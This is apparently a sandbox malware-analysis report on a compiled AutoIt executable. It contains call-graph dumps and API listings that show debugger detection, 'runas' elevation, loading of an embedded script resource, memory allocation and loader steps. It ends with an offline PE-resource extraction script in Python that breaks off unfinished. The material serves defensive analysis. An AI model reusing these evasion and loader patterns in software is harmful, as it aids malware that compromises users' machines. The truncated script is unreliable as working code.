105119->105454 105122 904e6a 105120->105122 105123 904e7b FreeLibrary 105120->105123 105122->104805 105123->105122 105125 907e4f 59 API calls 105124->105125 105126 9079fd 105125->105126 105126->105006 105128 903f82 105127->105128 105132 903fa4 _memmove 105127->105132 105130 920db6 Mailbox 59 API calls 105128->105130 105129 920db6 Mailbox 59 API calls 105131 903fb8 105129->105131 105130->105132 105131->105012 105132->105129 105182 904c03 105133->105182 105136 904c03 2 API calls 105139 904bdc 105136->105139 105137 904bf5 105140 92525b 105137->105140 105138 904bec FreeLibrary 105138->105137 105139->105137 105139->105138 105186 925270 105140->105186 105142 904dfc 105142->105021 105142->105022 105346 904c36 105143->105346 105146 904b8f 105148 904ba1 FreeLibrary 105146->105148 105149 904baa 105146->105149 105147 904c36 2 
API calls 105147->105146 105148->105149 105150 904c70 105149->105150 105151 920db6 Mailbox 59 API calls 105150->105151 105152 904c85 105151->105152 105350 90522e 105152->105350 105154 904c91 _memmove 105155 904ccc 105154->105155 105157 904dc1 105154->105157 105158 904d89 105154->105158 105156 904ec7 69 API calls 105155->105156 105165 904cd5 105156->105165 105364 96991b 95 API calls 105157->105364 105353 904e89 CreateStreamOnHGlobal 105158->105353 105161 904f0b 74 API calls 105161->105165 105163 904d69 105163->105030 105164 93d8a7 105166 904ee5 85 API calls 105164->105166 105165->105161 105165->105163 105165->105164 105359 904ee5 105165->105359 105167 93d8bb 105166->105167 105168 904f0b 74 API calls 105167->105168 105168->105163 105170 904f1d 105169->105170 105173 93d9cd 105169->105173 105388 9255e2 105170->105388 105174 969109 105408 968f5f 105174->105408 105176 96911f 105176->105037 105178 93d990 105177->105178 105179 904ed6 105177->105179 105413 925c60 105179->105413 105181 904ede 105181->105039 105183 904bd0 105182->105183 105184 904c0c LoadLibraryA 105182->105184 105183->105136 105183->105139 105184->105183 105185 904c1d GetProcAddress 105184->105185 105185->105183 105189 92527c __close 105186->105189 105187 92528f 105235 928b28 58 API calls __getptd_noexit 105187->105235 105189->105187 105191 9252c0 105189->105191 105190 925294 105236 928db6 9 API calls __write_nolock 105190->105236 105205 9304e8 105191->105205 105194 9252c5 105195 9252db 105194->105195 105196 9252ce 105194->105196 105197 925305 105195->105197 105198 9252e5 105195->105198 105237 928b28 58 API calls __getptd_noexit 105196->105237 105220 930607 105197->105220 105238 928b28 58 API calls __getptd_noexit 105198->105238 105202 92529f __close @_EH4_CallFilterFunc@8 105202->105142 105206 9304f4 __close 105205->105206 105207 929c0b __lock 58 API calls 105206->105207 105218 930502 105207->105218 105208 930576 105240 9305fe 105208->105240 105209 93057d 105245 92881d 58 API calls __malloc_crt 
[Execution graph residue: a flattened node/edge dump of the sample's call graph (numeric node IDs, code addresses, C runtime internals such as __wsopen_nolock, __write_nolock, __lock_file, __dosmaperr, and Windows API calls including CreateFileW, GetFileType, WriteFile, WriteConsoleW, WideCharToMultiByte, GetConsoleMode, GetConsoleCP, CloseHandle, GetLastError, GetFullPathNameW, GetLongPathNameW, SetCurrentDirectoryW, ReadFile, SetFilePointerEx, FindResourceExW, LoadResource, SizeofResource, LockResource, GetStringTypeW, CharUpperBuffW, IsDialogMessageW, GetClassLongW, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetVersionExW, GetCurrentProcess, IsWow64Process, GetSystemInfo, GetNativeSystemInfo, LoadLibraryA, GetProcAddress, FreeLibrary, GetFileAttributesW, FindFirstFileW, FindClose, GetSystemTimeAsFileTime, Sleep, GetPEB, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection). The graph layout itself is not reproduced here.]
12728df 106738->106747 106740 1272910 CreateFileW 106743 127291d 106740->106743 106740->106747 106741 1272939 VirtualAlloc 106742 127295a ReadFile 106741->106742 106741->106743 106742->106743 106746 1272978 VirtualAlloc 106742->106746 106744 1272b2c VirtualFree 106743->106744 106745 1272b3a 106743->106745 106744->106745 106745->106736 106746->106743 106746->106747 106747->106741 106747->106743 106748 1272a40 CloseHandle 106747->106748 106749 1272a50 VirtualFree 106747->106749 106751 1273750 GetPEB 106747->106751 106748->106747 106749->106747 106750->106736 106752 127377a 106751->106752 106752->106740 106753 90107d 106758 90708b 106753->106758 106755 90108c 106756 922d40 __cinit 67 API calls 106755->106756 106757 901096 106756->106757 106759 90709b __write_nolock 106758->106759 106760 907667 59 API calls 106759->106760 106761 907151 106760->106761 106762 904706 61 API calls 106761->106762 106763 90715a 106762->106763 106789 92050b 106763->106789 106766 907cab 59 API calls 106767 907173 106766->106767 106768 903f74 59 API calls 106767->106768 106769 907182 106768->106769 106770 907667 59 API calls 106769->106770 106771 90718b 106770->106771 106772 907d8c 59 API calls 106771->106772 106773 907194 RegOpenKeyExW 106772->106773 106774 93e8b1 RegQueryValueExW 106773->106774 106777 9071b6 Mailbox 106773->106777 106775 93e943 RegCloseKey 106774->106775 106776 93e8ce 106774->106776 106775->106777 106788 93e955 _wcscat Mailbox __wsetenvp 106775->106788 106778 920db6 Mailbox 59 API calls 106776->106778 106777->106755 106779 93e8e7 106778->106779 106781 90522e 59 API calls 106779->106781 106780 9079f2 59 API calls 106780->106788 106782 93e8f2 RegQueryValueExW 106781->106782 106783 93e90f 106782->106783 106785 93e929 106782->106785 106784 907bcc 59 API calls 106783->106784 106784->106785 106785->106775 106786 907de1 59 API calls 106786->106788 106787 903f74 59 API calls 106787->106788 106788->106777 106788->106780 106788->106786 106788->106787 106790 931940 __write_nolock 
106789->106790 106791 920518 GetFullPathNameW 106790->106791 106792 92053a 106791->106792 106793 907bcc 59 API calls 106792->106793 106794 907165 106793->106794 106794->106766 106795 93fdfc 106799 90ab30 Mailbox _memmove 106795->106799 106797 95617e Mailbox 59 API calls 106810 90a057 106797->106810 106800 920db6 59 API calls Mailbox 106799->106800 106801 90b525 106799->106801 106799->106810 106821 909f37 Mailbox 106799->106821 106823 907de1 59 API calls 106799->106823 106827 97bc6b 331 API calls 106799->106827 106829 90b2b6 106799->106829 106831 909ea0 331 API calls 106799->106831 106832 94086a 106799->106832 106834 940878 106799->106834 106836 94085c 106799->106836 106837 90b21c 106799->106837 106841 956e8f 59 API calls 106799->106841 106844 97df23 106799->106844 106847 97df37 106799->106847 106850 97c2e0 106799->106850 106882 967956 106799->106882 106888 95617e 106799->106888 106892 909c90 59 API calls Mailbox 106799->106892 106896 97c193 85 API calls 2 library calls 106799->106896 106800->106799 106898 969e4a 89 API calls 4 library calls 106801->106898 106804 9409e5 106903 969e4a 89 API calls 4 library calls 106804->106903 106805 940055 106897 969e4a 89 API calls 4 library calls 106805->106897 106806 90b900 60 API calls 106806->106821 106807 90b475 106816 908047 59 API calls 106807->106816 106811 940064 106812 920db6 59 API calls Mailbox 106812->106821 106814 90b47a 106814->106804 106814->106805 106816->106810 106818 908047 59 API calls 106818->106821 106819 956e8f 59 API calls 106819->106821 106820 907667 59 API calls 106820->106821 106821->106805 106821->106806 106821->106807 106821->106810 106821->106812 106821->106814 106821->106818 106821->106819 106821->106820 106822 922d40 67 API calls __cinit 106821->106822 106824 9409d6 106821->106824 106826 90a55a 106821->106826 106891 90c8c0 331 API calls 2 library calls 106821->106891 106822->106821 106823->106799 106902 969e4a 89 API calls 4 library calls 106824->106902 106901 969e4a 89 API calls 4 library calls 
106826->106901 106827->106799 106895 90f6a3 331 API calls 106829->106895 106831->106799 106899 909c90 59 API calls Mailbox 106832->106899 106900 969e4a 89 API calls 4 library calls 106834->106900 106836->106797 106836->106810 106893 909d3c 60 API calls Mailbox 106837->106893 106839 90b22d 106894 909d3c 60 API calls Mailbox 106839->106894 106841->106799 106904 97cadd 106844->106904 106846 97df33 106846->106799 106848 97cadd 130 API calls 106847->106848 106849 97df47 106848->106849 106849->106799 106851 907667 59 API calls 106850->106851 106852 97c2f4 106851->106852 106853 907667 59 API calls 106852->106853 106854 97c2fc 106853->106854 106855 907667 59 API calls 106854->106855 106856 97c304 106855->106856 106857 909837 84 API calls 106856->106857 106880 97c312 106857->106880 106858 907bcc 59 API calls 106858->106880 106859 97c4fb 106866 97c528 Mailbox 106859->106866 106996 909a3c 59 API calls Mailbox 106859->106996 106861 97c4e2 106865 907cab 59 API calls 106861->106865 106862 907924 59 API calls 106862->106880 106863 97c4fd 106867 907cab 59 API calls 106863->106867 106864 908047 59 API calls 106864->106880 106868 97c4ef 106865->106868 106866->106799 106869 97c50c 106867->106869 106871 907b2e 59 API calls 106868->106871 106872 907b2e 59 API calls 106869->106872 106870 907e4f 59 API calls 106874 97c3a9 CharUpperBuffW 106870->106874 106871->106859 106872->106859 106873 907e4f 59 API calls 106875 97c469 CharUpperBuffW 106873->106875 106994 90843a 68 API calls 106874->106994 106995 90c5a7 69 API calls 2 library calls 106875->106995 106878 909837 84 API calls 106878->106880 106879 907b2e 59 API calls 106879->106880 106880->106858 106880->106859 106880->106861 106880->106862 106880->106863 106880->106864 106880->106866 106880->106870 106880->106873 106880->106878 106880->106879 106881 907cab 59 API calls 106880->106881 106881->106880 106883 967962 106882->106883 106884 920db6 Mailbox 59 API calls 106883->106884 106885 967970 106884->106885 106886 96797e 106885->106886 
106887 907667 59 API calls 106885->106887 106886->106799 106887->106886 106997 9560c0 106888->106997 106890 95618c 106890->106799 106891->106821 106892->106799 106893->106839 106894->106829 106895->106801 106896->106799 106897->106811 106898->106836 106899->106836 106900->106836 106901->106810 106902->106804 106903->106810 106905 909837 84 API calls 106904->106905 106906 97cb1a 106905->106906 106929 97cb61 Mailbox 106906->106929 106942 97d7a5 106906->106942 106908 97cdb9 106909 97cf2e 106908->106909 106913 97cdc7 106908->106913 106981 97d8c8 92 API calls Mailbox 106909->106981 106912 97cf3d 106912->106913 106915 97cf49 106912->106915 106955 97c96e 106913->106955 106914 909837 84 API calls 106930 97cbb2 Mailbox 106914->106930 106915->106929 106920 97ce00 106970 920c08 106920->106970 106923 97ce33 106926 9092ce 59 API calls 106923->106926 106924 97ce1a 106976 969e4a 89 API calls 4 library calls 106924->106976 106928 97ce3f 106926->106928 106927 97ce25 GetCurrentProcess TerminateProcess 106927->106923 106931 909050 59 API calls 106928->106931 106929->106846 106930->106908 106930->106914 106930->106929 106974 97fbce 59 API calls 2 library calls 106930->106974 106975 97cfdf 61 API calls 2 library calls 106930->106975 106932 97ce55 106931->106932 106941 97ce7c 106932->106941 106977 908d40 59 API calls Mailbox 106932->106977 106934 97ce6b 106978 97d649 107 API calls _free 106934->106978 106935 97cfa4 106935->106929 106938 97cfb8 FreeLibrary 106935->106938 106938->106929 106941->106935 106979 908d40 59 API calls Mailbox 106941->106979 106980 909d3c 60 API calls Mailbox 106941->106980 106982 97d649 107 API calls _free 106941->106982 106943 907e4f 59 API calls 106942->106943 106944 97d7c0 CharLowerBuffW 106943->106944 106983 95f167 106944->106983 106948 907667 59 API calls 106949 97d7f9 106948->106949 106950 90784b 59 API calls 106949->106950 106952 97d810 106950->106952 106951 97d858 Mailbox 106951->106930 106953 907d2c 59 API calls 106952->106953 106954 97d81c Mailbox 
106953->106954 106954->106951 106990 97cfdf 61 API calls 2 library calls 106954->106990 106956 97c989 106955->106956 106957 97c9de 106955->106957 106958 920db6 Mailbox 59 API calls 106956->106958 106961 97da50 106957->106961 106960 97c9ab 106958->106960 106959 920db6 Mailbox 59 API calls 106959->106960 106960->106957 106960->106959 106962 97dc79 Mailbox 106961->106962 106966 97da73 _strcat _wcscpy __wsetenvp 106961->106966 106962->106920 106963 909b98 59 API calls 106963->106966 106964 909be6 59 API calls 106964->106966 106965 909b3c 59 API calls 106965->106966 106966->106962 106966->106963 106966->106964 106966->106965 106967 92571c 58 API calls __malloc_crt 106966->106967 106968 909837 84 API calls 106966->106968 106993 965887 61 API calls 2 library calls 106966->106993 106967->106966 106968->106966 106972 920c1d 106970->106972 106971 920cb5 VirtualProtect 106973 920c83 106971->106973 106972->106971 106972->106973 106973->106923 106973->106924 106974->106930 106975->106930 106976->106927 106977->106934 106978->106941 106979->106941 106980->106941 106981->106912 106982->106941 106984 95f192 __wsetenvp 106983->106984 106985 95f1d1 106984->106985 106988 95f1c7 106984->106988 106989 95f278 106984->106989 106985->106948 106985->106954 106988->106985 106991 9078c4 61 API calls 106988->106991 106989->106985 106992 9078c4 61 API calls 106989->106992 106990->106951 106991->106988 106992->106989 106993->106966 106994->106880 106995->106880 106996->106866 106998 9560e8 106997->106998 106999 9560cb 106997->106999 106998->106890 106999->106998 107001 9560ab 59 API calls Mailbox 106999->107001 107001->106999 107002 93fe27 107015 91f944 107002->107015 107004 93fe3d 107005 93fe53 107004->107005 107006 93febe 107004->107006 107024 909e5d 60 API calls 107005->107024 107011 90fce0 331 API calls 107006->107011 107008 93fe92 107009 94089c 107008->107009 107010 93fe9a 107008->107010 107026 969e4a 89 API calls 4 library calls 107009->107026 107025 96834f 59 API calls Mailbox 
107010->107025 107013 93feb2 Mailbox 107011->107013 107016 91f950 107015->107016 107017 91f962 107015->107017 107027 909d3c 60 API calls Mailbox 107016->107027 107019 91f991 107017->107019 107020 91f968 107017->107020 107028 909d3c 60 API calls Mailbox 107019->107028 107021 920db6 Mailbox 59 API calls 107020->107021 107023 91f95a 107021->107023 107023->107004 107024->107008 107025->107013 107026->107013 107027->107023 107028->107023 107029 901066 107034 90f76f 107029->107034 107031 90106c 107032 922d40 __cinit 67 API calls 107031->107032 107033 901076 107032->107033 107035 90f790 107034->107035 107067 91ff03 107035->107067 107039 90f7d7 107040 907667 59 API calls 107039->107040 107041 90f7e1 107040->107041 107042 907667 59 API calls 107041->107042 107043 90f7eb 107042->107043 107044 907667 59 API calls 107043->107044 107045 90f7f5 107044->107045 107046 907667 59 API calls 107045->107046 107047 90f833 107046->107047 107048 907667 59 API calls 107047->107048 107049 90f8fe 107048->107049 107077 915f87 107049->107077 107053 90f930 107054 907667 59 API calls 107053->107054 107055 90f93a 107054->107055 107105 91fd9e 107055->107105 107057 90f981 107058 90f991 GetStdHandle 107057->107058 107059 90f9dd 107058->107059 107060 9445ab 107058->107060 107061 90f9e5 OleInitialize 107059->107061 107060->107059 107062 9445b4 107060->107062 107061->107031 107112 966b38 64 API calls Mailbox 107062->107112 107064 9445bb 107113 967207 CreateThread 107064->107113 107066 9445c7 CloseHandle 107066->107061 107114 91ffdc 107067->107114 107070 91ffdc 59 API calls 107071 91ff45 107070->107071 107072 907667 59 API calls 107071->107072 107073 91ff51 107072->107073 107074 907bcc 59 API calls 107073->107074 107075 90f796 107074->107075 107076 920162 6 API calls 107075->107076 107076->107039 107078 907667 59 API calls 107077->107078 107079 915f97 107078->107079 107080 907667 59 API calls 107079->107080 107081 915f9f 107080->107081 107121 915a9d 107081->107121 107084 915a9d 59 API calls 107085 
915faf 107084->107085 107086 907667 59 API calls 107085->107086 107087 915fba 107086->107087 107088 920db6 Mailbox 59 API calls 107087->107088 107089 90f908 107088->107089 107090 9160f9 107089->107090 107091 916107 107090->107091 107092 907667 59 API calls 107091->107092 107093 916112 107092->107093 107094 907667 59 API calls 107093->107094 107095 91611d 107094->107095 107096 907667 59 API calls 107095->107096 107097 916128 107096->107097 107098 907667 59 API calls 107097->107098 107099 916133 107098->107099 107100 915a9d 59 API calls 107099->107100 107101 91613e 107100->107101 107102 920db6 Mailbox 59 API calls 107101->107102 107103 916145 RegisterWindowMessageW 107102->107103 107103->107053 107106 95576f 107105->107106 107107 91fdae 107105->107107 107124 969ae7 60 API calls 107106->107124 107109 920db6 Mailbox 59 API calls 107107->107109 107111 91fdb6 107109->107111 107110 95577a 107111->107057 107112->107064 107113->107066 107125 9671ed 65 API calls 107113->107125 107115 907667 59 API calls 107114->107115 107116 91ffe7 107115->107116 107117 907667 59 API calls 107116->107117 107118 91ffef 107117->107118 107119 907667 59 API calls 107118->107119 107120 91ff3b 107119->107120 107120->107070 107122 907667 59 API calls 107121->107122 107123 915aa5 107122->107123 107123->107084 107124->107110 107126 968d0d 107127 968d20 107126->107127 107128 968d1a 107126->107128 107129 968d31 107127->107129 107131 922d55 _free 58 API calls 107127->107131 107130 922d55 _free 58 API calls 107128->107130 107132 968d43 107129->107132 107133 922d55 _free 58 API calls 107129->107133 107130->107127 107131->107129 107133->107132 107134 94416f 107138 955fe6 107134->107138 107136 94417a 107137 955fe6 85 API calls 107136->107137 107137->107136 107140 955ff3 107138->107140 107145 956020 107138->107145 107139 956022 107150 909328 84 API calls Mailbox 107139->107150 107140->107139 107141 956027 107140->107141 107140->107145 107147 95601a 107140->107147 107143 909837 84 API calls 107141->107143 
107144 95602e 107143->107144 107146 907b2e 59 API calls 107144->107146 107145->107136 107146->107145 107149 9095a0 59 API calls _wcsstr 107147->107149 107149->107145 107150->107141

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00903B68
                                          • IsDebuggerPresent.KERNEL32 ref: 00903B7A
                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,009C52F8,009C52E0,?,?), ref: 00903BEB
                                            • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
                                            • Part of subcall function 0091092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00903C14,009C52F8,?,?,?), ref: 0091096E
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00903C6F
                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009B7770,00000010), ref: 0093D281
                                          • SetCurrentDirectoryW.KERNEL32(?,009C52F8,?,?,?), ref: 0093D2B9
                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,009B4260,009C52F8,?,?,?), ref: 0093D33F
                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 0093D346
                                            • Part of subcall function 00903A46: GetSysColorBrush.USER32(0000000F), ref: 00903A50
                                            • Part of subcall function 00903A46: LoadCursorW.USER32(00000000,00007F00), ref: 00903A5F
                                            • Part of subcall function 00903A46: LoadIconW.USER32(00000063), ref: 00903A76
                                            • Part of subcall function 00903A46: LoadIconW.USER32(000000A4), ref: 00903A88
                                            • Part of subcall function 00903A46: LoadIconW.USER32(000000A2), ref: 00903A9A
                                            • Part of subcall function 00903A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00903AC0
                                            • Part of subcall function 00903A46: RegisterClassExW.USER32(?), ref: 00903B16
                                            • Part of subcall function 009039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00903A03
                                            • Part of subcall function 009039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00903A24
                                            • Part of subcall function 009039D5: ShowWindow.USER32(00000000,?,?), ref: 00903A38
                                            • Part of subcall function 009039D5: ShowWindow.USER32(00000000,?,?), ref: 00903A41
                                            • Part of subcall function 0090434A: _memset.LIBCMT ref: 00904370
                                            • Part of subcall function 0090434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00904415
                                          Strings
                                          • This is a third-party compiled AutoIt script., xrefs: 0093D279
                                          • runas, xrefs: 0093D33A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                          • String ID: This is a third-party compiled AutoIt script.$runas
                                          • API String ID: 529118366-3287110873
                                          • Opcode ID: 936afd9a5c295f65b90d7f0adf2e90c39b93d3ce8c34a17cf9eb6b9115ee38d6
                                          • Instruction ID: 8d14808ff41e2cbb7671046c7ff0b58ac409613c958ac6238dcbfadd4972fa47
                                          • Opcode Fuzzy Hash: 936afd9a5c295f65b90d7f0adf2e90c39b93d3ce8c34a17cf9eb6b9115ee38d6
                                          • Instruction Fuzzy Hash: C351E871D08208AEDF11EBF4EC15FEDB7BCAF95754F008169F861A21E1CA706A85DB21

                                          Control-flow Graph

                                          control_flow_graph 996 9049a0-904a00 call 907667 GetVersionExW call 907bcc 1001 904a06 996->1001 1002 904b0b-904b0d 996->1002 1004 904a09-904a0e 1001->1004 1003 93d767-93d773 1002->1003 1005 93d774-93d778 1003->1005 1006 904b12-904b13 1004->1006 1007 904a14 1004->1007 1009 93d77b-93d787 1005->1009 1010 93d77a 1005->1010 1008 904a15-904a4c call 907d2c call 907726 1006->1008 1007->1008 1018 904a52-904a53 1008->1018 1019 93d864-93d867 1008->1019 1009->1005 1012 93d789-93d78e 1009->1012 1010->1009 1012->1004 1014 93d794-93d79b 1012->1014 1014->1003 1016 93d79d 1014->1016 1020 93d7a2-93d7a5 1016->1020 1018->1020 1021 904a59-904a64 1018->1021 1022 93d880-93d884 1019->1022 1023 93d869 1019->1023 1024 904a93-904aaa GetCurrentProcess IsWow64Process 1020->1024 1025 93d7ab-93d7c9 1020->1025 1026 93d7ea-93d7f0 1021->1026 1027 904a6a-904a6c 1021->1027 1030 93d886-93d88f 1022->1030 1031 93d86f-93d878 1022->1031 1028 93d86c 1023->1028 1032 904aac 1024->1032 1033 904aaf-904ac0 1024->1033 1025->1024 1029 93d7cf-93d7d5 1025->1029 1038 93d7f2-93d7f5 1026->1038 1039 93d7fa-93d800 1026->1039 1034 904a72-904a75 1027->1034 1035 93d805-93d811 1027->1035 1028->1031 1036 93d7d7-93d7da 1029->1036 1037 93d7df-93d7e5 1029->1037 1030->1028 1040 93d891-93d894 1030->1040 1031->1022 1032->1033 1041 904ac2-904ad2 call 904b37 1033->1041 1042 904b2b-904b35 GetSystemInfo 1033->1042 1043 93d831-93d834 1034->1043 1044 904a7b-904a8a 1034->1044 1046 93d813-93d816 1035->1046 1047 93d81b-93d821 1035->1047 1036->1024 1037->1024 1038->1024 1039->1024 1040->1031 1053 904ad4-904ae1 call 904b37 1041->1053 1054 904b1f-904b29 GetSystemInfo 1041->1054 1045 904af8-904b08 1042->1045 1043->1024 1050 93d83a-93d84f 1043->1050 1051 904a90 1044->1051 1052 93d826-93d82c 1044->1052 1046->1024 1047->1024 1055 93d851-93d854 1050->1055 1056 93d859-93d85f 1050->1056 1051->1024 1052->1024 1061 904ae3-904ae7 GetNativeSystemInfo 1053->1061 1062 904b18-904b1d 1053->1062 1058 904ae9-904aed 
1054->1058 1055->1024 1056->1024 1058->1045 1060 904aef-904af2 FreeLibrary 1058->1060 1060->1045 1061->1058 1062->1061
                                          APIs
                                          • GetVersionExW.KERNEL32(?), ref: 009049CD
                                            • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
                                          • GetCurrentProcess.KERNEL32(?,0098FAEC,00000000,00000000,?), ref: 00904A9A
                                          • IsWow64Process.KERNEL32(00000000), ref: 00904AA1
                                          • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00904AE7
                                          • FreeLibrary.KERNEL32(00000000), ref: 00904AF2
                                          • GetSystemInfo.KERNEL32(00000000), ref: 00904B23
                                          • GetSystemInfo.KERNEL32(00000000), ref: 00904B2F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                          • String ID:
                                          • API String ID: 1986165174-0
                                          • Opcode ID: 10c7685e054eb1ba22db4dd1bfb0150b52a60317b6ed72e60b27f4925951fd38
                                          • Instruction ID: 1f8516d252c4e22523c4866dacaecf0a6ca38275e9a02a305066987e58db57b8
                                          • Opcode Fuzzy Hash: 10c7685e054eb1ba22db4dd1bfb0150b52a60317b6ed72e60b27f4925951fd38
                                          • Instruction Fuzzy Hash: 1B91A57198E7C0DECB31DB6895601AAFFF9AF29300F444D6DD1C793A81D224B908DB59

                                          Control-flow Graph

                                          control_flow_graph 1063 904e89-904ea1 CreateStreamOnHGlobal 1064 904ec1-904ec6 1063->1064 1065 904ea3-904eba FindResourceExW 1063->1065 1066 93d933-93d942 LoadResource 1065->1066 1067 904ec0 1065->1067 1066->1067 1068 93d948-93d956 SizeofResource 1066->1068 1067->1064 1068->1067 1069 93d95c-93d967 LockResource 1068->1069 1069->1067 1070 93d96d-93d98b 1069->1070 1070->1067
                                          APIs
                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00904D8E,?,?,00000000,00000000), ref: 00904E99
                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00904D8E,?,?,00000000,00000000), ref: 00904EB0
                                          • LoadResource.KERNEL32(?,00000000,?,?,00904D8E,?,?,00000000,00000000,?,?,?,?,?,?,00904E2F), ref: 0093D937
                                          • SizeofResource.KERNEL32(?,00000000,?,?,00904D8E,?,?,00000000,00000000,?,?,?,?,?,?,00904E2F), ref: 0093D94C
                                          • LockResource.KERNEL32(00904D8E,?,?,00904D8E,?,?,00000000,00000000,?,?,?,?,?,?,00904E2F,00000000), ref: 0093D95F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                          • String ID: SCRIPT
                                          • API String ID: 3051347437-3967369404
                                          • Opcode ID: 00781eccf784d15a77c734b4da56e3fc8ccfceb5030734bd9a2c583c0d07e5d7
                                          • Instruction ID: a393a68b2efeee1a7690aff6c39845d834bb41a2f14f2af46353014746081476
                                          • Opcode Fuzzy Hash: 00781eccf784d15a77c734b4da56e3fc8ccfceb5030734bd9a2c583c0d07e5d7
                                          • Instruction Fuzzy Hash: E1115AB5240700BFD7218B65EC58F677BBEFBC9B21F20426CF516C62A0DB61E8019A60
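The FindResourceExW(type 0x0A, "SCRIPT") -> LoadResource -> SizeofResource -> LockResource chain listed above is how the compiled-AutoIt stub locates its embedded script: an RCDATA resource (type 10) named "SCRIPT". The following Python is an added example, not code from the report, from Joe Sandbox or from AutoIt: it performs the same three-level resource-directory walk (type, name, language) offline on a file image, so the blob can be pulled from a sample without executing it. The build_test_pe() helper at the bottom fabricates a minimal PE32 with a single .rsrc section purely so the parser can be tested without a real sample; the payload it embeds is constructed dummy data, not this sample's script.

```python
"""Extract the RCDATA resource named "SCRIPT" from a PE image (added example)."""
import struct

RT_RCDATA = 10                      # resource type 0x0A seen in the FindResourceExW call
IMAGE_DIRECTORY_ENTRY_RESOURCE = 2  # index into the optional-header data directories


def _u16(b, o): return struct.unpack_from("<H", b, o)[0]
def _u32(b, o): return struct.unpack_from("<I", b, o)[0]


def _resource_dir_and_sections(pe):
    """Return (resource directory RVA, [(VirtualAddress, size, PointerToRawData), ...])."""
    e_lfanew = _u32(pe, 0x3C)
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = _u16(pe, e_lfanew + 6)
    opt_size = _u16(pe, e_lfanew + 20)
    opt = e_lfanew + 24
    magic = _u16(pe, opt)
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic %#x" % magic)
    # Data directories start after the 96-byte (PE32) or 112-byte (PE32+) fixed fields.
    dd = opt + (96 if magic == 0x10B else 112) + 8 * IMAGE_DIRECTORY_ENTRY_RESOURCE
    secs = []
    for i in range(nsec):
        s = opt + opt_size + 40 * i
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", pe, s + 8)
        secs.append((va, max(vsize, rawsize), rawptr))
    return _u32(pe, dd), secs


def rva_to_offset(secs, rva):
    """Map an RVA to a file offset through the section table."""
    for va, size, rawptr in secs:
        if va <= rva < va + size:
            return rva - va + rawptr
    raise ValueError("RVA %#x is not backed by any section" % rva)


def _entries(pe, base, dir_off):
    """Yield (name-or-id, target offset, is_subdirectory) for one IMAGE_RESOURCE_DIRECTORY."""
    d = base + dir_off
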